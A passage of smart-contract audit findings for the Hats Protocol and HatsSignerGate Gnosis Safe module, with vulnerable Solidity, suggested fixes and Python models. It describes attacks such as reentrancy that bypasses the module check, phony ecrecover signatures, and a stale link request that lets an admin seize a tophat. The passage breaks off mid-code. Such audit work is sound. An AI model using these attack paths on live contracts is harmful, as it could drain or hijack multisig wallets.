`validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. 
This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.
Edit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\n
A simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.
```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n
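The missed branch and the suggested clamp can be checked with a minimal Python model of the threshold-update logic (illustrative; `0` means "no update", matching the `newThreshold > 0` guard):

```python
def new_threshold_buggy(valid, current, target):
    # mirrors the original if/else-if: misses target < current <= valid
    if valid <= target and valid != current:
        return valid
    elif valid > target and current < target:
        return target
    return 0  # 0 means "leave the safe threshold as-is"

def new_threshold_fixed(valid, current, target):
    # recommended: always clamp to target, update on any change
    new = valid if valid <= target else target
    return new if new != current else 0

# scenario from the finding: target lowered to 9 while the safe threshold
# sat at 10, with 10 valid signers
valid, current, target = 10, 10, 9
assert new_threshold_buggy(valid, current, target) == 0  # stuck above target
assert new_threshold_fixed(valid, current, target) == 9  # clamped to target
```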
If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked
medium
`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. 
This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.
The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != modulesWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n
If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.
```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n
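The pagination mismatch is easy to reproduce in a Python model (illustrative; a list slice stands in for `getModulesPaginated`):

```python
def get_modules_paginated(modules, page_size):
    # model of GnosisSafe.getModulesPaginated: returns at most page_size entries
    return modules[:page_size]

existing = [f"module{i}" for i in range(7)]   # safe already has 7 modules
seen = get_modules_paginated(existing, 5)     # deployment only sees 5 of them
enabled_module_count = len(seen) + 1          # recorded as 6; reality is 8

after_attach = existing + ["HatsSignerGate"]
# pre-flight hashes the first enabled_module_count modules...
pre = tuple(get_modules_paginated(after_attach, enabled_module_count))
# ...post-flight hashes one more, and the extra real module appears
post = tuple(get_modules_paginated(after_attach, enabled_module_count + 1))
assert pre != post  # hashes differ, so every transaction reverts
```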
If a hat is owned by address(0), phony signatures will be accepted by the safe
medium
If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... 
which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.
The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.
If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.
```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n
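The zero-address hole can be modeled with a small Python sketch (illustrative; a string constant stands in for `address(0)` and a dict for the hat balance storage):

```python
ZERO = "0x0"  # stand-in for address(0)

def ecrecover_model(sig_valid):
    # ecrecover returns the signer for a valid sig, address(0) for a phony one
    return "0xSigner" if sig_valid else ZERO

hat_balance = {ZERO: 1}  # a hat was minted or sent to address(0)

def is_valid_signer(account):
    # current logic: a plain balance check, no zero-address guard
    return hat_balance.get(account, 0) > 0

def is_valid_signer_fixed(account):
    # recommended: reject address(0) recovered from a phony signature
    return account != ZERO and hat_balance.get(account, 0) > 0

phony = ecrecover_model(sig_valid=False)
assert is_valid_signer(phony) is True         # phony signature accepted
assert is_valid_signer_fixed(phony) is False  # guard rejects it
```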
Swap Signer fails if final owner is invalid due to off by one error in loop
medium
New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for 
the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.
Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n
When only the final owner is invalid, new users will not be able to claim their role as signer, even though they should.
```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n
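The off-by-one bound translates directly into a Python model (illustrative; `range(len - 1)` mirrors the `i < _ownerCount - 1` loop condition):

```python
def find_invalid_buggy(owners, is_valid):
    # off by one: the last owner is never checked
    for i in range(len(owners) - 1):
        if not is_valid(owners[i]):
            return i
    return None

def find_invalid_fixed(owners, is_valid):
    # fix: iterate over every owner
    for i in range(len(owners)):
        if not is_valid(owners[i]):
            return i
    return None

owners = ["0xA", "0xB", "0xC"]
is_valid = lambda o: o != "0xC"  # only the final owner is invalid
assert find_invalid_buggy(owners, is_valid) is None  # swap is missed
assert find_invalid_fixed(owners, is_valid) == 2
```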
targetThreshold can be set below minThreshold, violating important invariant
medium
There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.
Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n
Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.
```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n
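The one-sided invariant check can be demonstrated with a small Python model of the two setters (illustrative; a dict stands in for contract storage and `ValueError` for the custom reverts):

```python
def set_min_threshold(state, v):
    # guarded: min must not exceed maxSigners or targetThreshold
    if v > state["maxSigners"] or v > state["targetThreshold"]:
        raise ValueError("InvalidMinThreshold")
    state["minThreshold"] = v

def set_target_threshold_buggy(state, v):
    # original: only an upper-bound check, no comparison against minThreshold
    if v > state["maxSigners"]:
        raise ValueError("InvalidTargetThreshold")
    state["targetThreshold"] = v

def set_target_threshold_fixed(state, v):
    # recommended: also enforce minThreshold <= targetThreshold
    if v < state["minThreshold"] or v > state["maxSigners"]:
        raise ValueError("InvalidTargetThreshold")
    state["targetThreshold"] = v

s = {"maxSigners": 10, "minThreshold": 3, "targetThreshold": 5}
set_target_threshold_buggy(s, 2)  # silently breaks min <= target
assert s["targetThreshold"] < s["minThreshold"]
try:
    set_target_threshold_fixed(s, 2)
    raise AssertionError("should have reverted")
except ValueError:
    pass
```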
Hats can be overwritten
medium
Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.
Check if the admin exists before creating the hat, by checking any of its properties against default values:\\n```\\nrequire(_hats[admin].maxSupply > 0, "Admin not created")\\n```\\n
null
```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n
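The overwrite hazard and the recommended admin-existence check can be modeled in Python (illustrative; a dict stands in for the `_hats` mapping, and `create_hat_fixed` models the suggested `require`):

```python
hats = {}  # hat id -> properties dict (stand-in for the _hats mapping)

def create_hat_buggy(admin_id, hat_id, props):
    # no admin-existence check; writing to an existing id silently overwrites
    hats[hat_id] = props

def create_hat_fixed(admin_id, hat_id, props):
    # models: require(_hats[admin].maxSupply > 0, "Admin not created")
    if hats.get(admin_id, {}).get("maxSupply", 0) == 0:
        raise ValueError("Admin not created")
    hats[hat_id] = props

# child "1.1.1" created under the not-yet-created admin "1.1"
create_hat_buggy("1.1", "1.1.1", {"maxSupply": 5, "mutable": False})
# creating admin "1.1" later lets "1.1.1" be re-issued, overwriting the
# previously immutable child
create_hat_buggy("1", "1.1.1", {"maxSupply": 1, "mutable": True})
assert hats["1.1.1"]["mutable"] is True  # immutability violated

hats.clear()
try:
    create_hat_fixed("1.1", "1.1.1", {"maxSupply": 5, "mutable": False})
    raise AssertionError("should have reverted")
except ValueError:
    pass
```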
Unlinked tophat retains linkedTreeRequests, can be rugged
high
When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to "takeover" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a "request" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. 
Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission
In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n
Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.
```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n
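The rug described above can be modeled with a minimal Python sketch (hypothetical names, not the contract code) that mirrors the two mappings and shows the stale request surviving the unlink:

```python
# Toy model of the link/unlink flow; dict keys stand in for tophat domains.
linked_tree_admins = {}
linked_tree_requests = {}

def request_link(domain, admin):
    # requestLinkTopHatToTree: current admin can plant a request
    linked_tree_requests[domain] = admin

def approve_link(domain, admin):
    # approveLinkTopHatToTree: only succeeds against a pending request
    assert linked_tree_requests.get(domain) == admin, "LinkageNotRequested"
    del linked_tree_requests[domain]
    linked_tree_admins[domain] = admin

def unlink(domain):
    # unlinkTopHatFromTree: bug -- linked_tree_requests[domain] survives
    linked_tree_admins.pop(domain, None)

# Admin A plants a request while still admin, then unlinks as promised
request_link(1, "attacker_hat")
unlink(1)
# Later: the stale request is approved and the "sovereign" tophat is recaptured
approve_link(1, "attacker_hat")
assert linked_tree_admins[1] == "attacker_hat"
```

Adding `linked_tree_requests.pop(domain, None)` inside `unlink` (mirroring the recommended `delete`) makes the later `approve_link` fail as intended.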
Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold
high
The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.
Change the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n
All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`. As described above, this may not be possible (e.g. a single signer hat whose eligibility module cannot revoke signers, with `validSignerCount` above `maxSigners`), in which case the safe is permanently bricked.
```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n
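The intended clamping can be modeled in Python (a hypothetical sketch mirroring the branch logic above) to show what `changeThreshold` should receive:

```python
def new_threshold(valid_signer_count, target, current):
    """Mirror of the intended clamping: threshold = min(validSignerCount, target)."""
    if valid_signer_count <= target and valid_signer_count != current:
        return valid_signer_count
    if valid_signer_count > target and current < target:
        return target
    return current  # no change needed

# With 12 valid signers and a target of 10, the intended threshold is 10,
# but the buggy call passes validSignerCount (12) to changeThreshold.
intended = new_threshold(12, target=10, current=8)
buggy = 12
assert intended == 10 and buggy > intended
```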
Signers can bypass checks to add new modules to a safe by abusing reentrancy
high
The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the hash of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. 
Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Dysfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. 
But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass
Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.
Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
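The broken guard can be modeled with a toy Python counter (hypothetical, not the contract): incrementing in `checkTransaction()` lets a reentrant call balance out the decrements, while setting the counter to 1 would force an underflow:

```python
class Guard:
    """Toy model of the _guardEntries counter (hypothetical, not the contract)."""
    def __init__(self):
        self.entries = 0

    def check_transaction_increment(self):
        self.entries += 1   # current design: a reentrant call just bumps the counter

    def check_transaction_set(self):
        self.entries = 1    # proposed fix: a reentrant call overwrites, forcing underflow

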